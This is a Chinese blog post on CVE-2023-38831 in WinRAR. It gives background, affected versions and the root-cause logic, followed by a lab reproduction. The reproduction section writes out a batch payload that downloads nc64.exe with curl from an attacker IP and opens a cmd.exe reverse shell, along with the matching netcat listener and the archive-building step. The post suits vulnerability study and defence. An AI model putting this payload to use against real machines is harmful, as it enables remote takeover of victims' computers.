CVE-2023-38831 WinRAR代码执行漏洞

已于 2024-10-17 14:16:01 修改
阅读量663 收藏 9
点赞数 8
分类专栏: CVE漏洞复现 文章标签: winrar
于 2024-10-16 18:53:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64177395/article/details/142988414
版权

漏洞概况

winRAR介绍

1、常见压缩格式 zip、rar、7z

2、常用压缩软件 WinRAR、Bandizip、7z、360压缩、2345好压

3、发展历史 since 1995

rarlab公司 特性:分卷压缩、支持unicode字符、压缩率高

只有WinRAR软件可以创建rar格式的压缩包,其他软件可以解压

造福无数打工人的WinRAR,为什么活的这么卑微?

https://zhuanlan.zhihu.com/p/639814936

漏洞情况

2023年8月24日 安全公司Group-IB公布漏洞

https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/

影响版本:6.23之前的所有版本

影响级别:千万级

rarlab公司在2023年8月2日发布的6.23版本修补了这一漏洞。

漏洞复现

1、kali启动HTTP服务 在nc64.exe(netcat)目录下: python -m http.server

2、Kali启动端口监听 nc -lnvp 4444 (建立反弹连接)

3、本地POC文件制作 test.png、script.bat,脚本内容 curl http://192.168.14.13:8000/nc64.exe -O nc64.exe & nc64.exe 192.168.14.13 4444 -e cmd.exe -d & test.png python .\make.py test.png script.bat poc.zip

(红色部分以你实际的攻击机IP为准)

script.bat:

通过python脚本构造恶意压缩包:

.\make.py test.png script.bat poc.zip

恶意压缩包构建完成:

4、在WinRAR(<=6.22)中打开POC文件 双击普通文件,漏洞触发(运行script.bat内容、下载nc64.exe、建立反弹连接)

版本信息:

双击打开test.png:

跳出如下界面:

回到攻击机视角,靶机成功上线

漏洞原理

1、当受害者尝试打开存档文件中的"test.png "时, WinRAR会比较存档中的所有文件以查找与"test.png "同 名的文件/目录

2、如果存在与"test.png "同名的目录,WinRAR则会继 续检查"test.png /"目录下的文件

3、如果"test.png /"目录下同样存在文件名为"test.png " 的文件则将"test.png /"目录下"test.png "文件放入提取 列表中

4、最终导致压缩包中的test.png .cmd被解压出来,并且运行

详情请看下篇文章:

https://blog.csdn.net/qq_38924942/article/details/132571600

漏洞复现】RARLAB WinRAR 代码执行漏洞RCE (CVE-2023-38831)
李火火的安全圈
09-11 1258
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码
WinRAR<6.23 远程代码执行漏洞【Poc公开】(CVE-2023-38831) [有POC]
OSCS开源安全社区
08-28 451
墨知是国内首个专注软件供应链安全领域的技术社区,社区致力于为国内数百万技术人员提供全方位的软件供应链安全专业知识内容,包括软件供应链安全技术、漏洞情报、开源组件安全、SBOM、软件成分分析(SCA)、开源许可证合规等前沿技术及最佳实践。墨知通过促进知识共享、技术研究和合作交流,帮助组织和个人提高软件供应链的安全性,减少供应链攻击的风险,并保护软件生态系统的整体安全。
CVE-2023-38831 WinRAR 逻辑漏洞原因分析
CuiXY's Blog
08-29 2609
漏洞编号:CVE-2023-38831 漏洞类型:逻辑漏洞 软件名称:RARLAB WinRAR 模块名称:WinRAR.exe 历史漏洞:根据 vuldb 显示,历史漏洞并不是很多,能稳定利用的更是少之又少
WinRAR 0day CVE-2023-38831分析复现及poc
yuanlirong22的专栏
08-27 2608
最近WinRARCVE-2023-38831 漏洞被在野利用POC已可使用。漏洞影响版本:WinRa
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
【Rainbow Network Technology co., LTD】
08-25 1803
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法的文件时,即被安装恶意程序。
CVE-2023-38831(Winrar RCE)漏洞复现与分析
m0_55994898的博客
12-10 4221
本文对Winrar RCE漏洞(CVE-2023-38831)进行复现以及原理分析,对攻击过程进行还原,让你更直观的感受此漏洞的攻击面。对于Reverse本人并不擅长,所以此篇文章参考了很多互联网公开的对此漏洞的研究分析报告,文末标注。
CVE漏洞复现-CVE-2023-38831 WinRAR代码执行漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
10-27 2539
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。从5.60版开始,WinRAR启用了新的图标,但用户仍可以通过官网提供的主题包换回原版风格的图标。
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
WinRAR代码执行漏洞(CVE-2023-38831)
qq_42751192的博客
08-29 679
WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如JPG文件)后,将在受害者机器上执行任意代码
winrar(CVE-2023-38831)漏洞分析
4SecNet团队专栏
09-28 994
WinRAR 是一种流行的文件归档程序,全世界有数百万人使用。它可以创建和查看 RAR 或 ZIP 文件格式的存档,并解压多种存档文件格式。WinRAR 支持创建加密、多部分和自解压存档。WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如JPG文件)后,将在受害者机器上执行任意代码
WinRAR 代码执行漏洞RCE (CVE-2023-38831)-资源包
09-11
WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码。 RARLabs WinRAR 6.23之前版本存在安全漏洞...
WinRAR CVE-2023-38831简单复现
潇湘信安的博客
09-18 423
CVE-2023-38831漏洞2023 年 4 月至 2023 年 8 月期间在野外被利用。当用户尝试查看 ZIP 存档中的良性文件时,WinRAR 6.23之前的版本允许攻击者执行任意代码。出现此问题的原因是 ZIP 存档可能包含良性文件(例如普通 .JPG 文件)以及与良性文件同名的文件夹,并且处理该文件夹的内容(可能包括可执行内容)在尝试仅访问良性文件期间。
Asun安全学习【漏洞复现】CVE-2023-38831 WinRAR代码执行漏洞
m0_64993865的博客
07-08 1896
学习!!!!!
深入解析CVE-2023-38831WinRAR代码执行漏洞复现资源文件
gitblog_06577的博客
09-20 997
深入解析CVE-2023-38831WinRAR代码执行漏洞复现资源文件 CVE漏洞复现-CVE-2023-38831WinRAR代码执行漏洞 项目地址: https://gitcode.com/Resource-Bundle...
CVE-2023-38831 漏洞
最新发布
weixin_45422672的博客
02-05 381
是一个利用 Windows 10 压缩文件处理机制的漏洞。攻击者可以通过在压缩文件中嵌入恶意脚本或可执行文件,并利用特定的文件名或路径来触发漏洞,从而在用户解压文件时执行恶意代码
winrar代码执行漏洞CVE-2023-38831复现
为之的博客
08-29 344
参考:https://www.youtube.com/watch?保存后,点击下面的png图片即可执行代码
WinRAR 0day漏洞CVE-2023-38831复现最详解
weixin_45971758的博客
08-28 2250
WinRARCVE-2023-38831 漏洞被在野利用来攻击交易类的个人用户。影响版本:WinRar 版本 < 6.23。
CVE-2023-38831 漏洞复现:win10 压缩包挂马攻击剖析
xinyaoyaotu的博客
01-27 2505
在网络安全这片没有硝烟的战场上,新型漏洞如同隐匿的暗箭,时刻威胁着我们的数字生活。其中,CVE - 2023 - 38831 这个关联 Win10 压缩包挂马攻击的漏洞,自曝光以来便引发了安全界的高度关注。深入探究并复现这一漏洞,不仅能让我们洞悉攻击者的手段,更能助力我们筑牢防线,抵御此类威胁。CVE - 2023 - 388312023 年披露的一个高危安全漏洞,主要影响 Windows 10 系统。攻击者利用这一漏洞,精心炮制恶意压缩包。
WinRAR远程执行漏洞CVE-2023-38831解析及防范
根据提供的文件信息,以下是对CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC的详细知识点介绍: **标题知识点** 1. **CVE-2023-38831漏洞概述** - CVE是“Common Vulnerabilities and Exposures”的缩写,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值